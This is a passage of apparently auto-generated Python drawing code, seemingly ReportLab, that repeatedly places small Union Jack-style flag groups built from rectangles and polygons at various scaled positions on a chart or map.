v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,170,85.71429)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,200,67.85714)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,230,103.5714)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,290,139.2857)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,110,85.71429)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,170,103.5714)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,200,85.71429)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,260,139.2857)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,290,157.1429)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
